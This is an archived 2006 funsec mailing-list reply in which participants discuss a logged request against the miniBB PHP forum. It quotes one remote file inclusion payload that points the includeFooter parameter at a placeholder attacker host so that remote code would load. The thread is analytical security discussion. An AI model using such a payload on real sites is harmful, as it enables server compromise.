funsec mailing list archives
Re: interesting attack
From: Valdis.Kletnieks () vt edu
Date: Wed, 19 Apr 2006 14:17:39 -0400
On Wed, 19 Apr 2006 12:33:05 CDT, Technocrat said:
On 4/14/06, Peter Kosinar <goober () nuf ksp sk> wrote:GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1Without researching it, I would guess that it is a command/script injection attack in a PHP based BB system. Looks like she is using a poor file handler for the injection. Again, this is without research.
And it's a skript kiddie doing it, as they forgot to fix the [attacker] to "your website here",,,, :) I saw a spam recently with a 'From: youruserid () yourspamsite com'. "D'oh!" -- H. Simpson
Attachment:
_bin
Description:
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- interesting attack Henderson, Dennis K. (Apr 14)
- Re: interesting attack Anthony Rodgers (Apr 16)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Valdis . Kletnieks (Apr 19)
- Re: interesting attack Brian Loe (Apr 19)
- Re: interesting attack Technocrat (Apr 19)
- Re: interesting attack Peter Kosinar (Apr 19)
- Re: interesting attack Technocrat (Apr 19)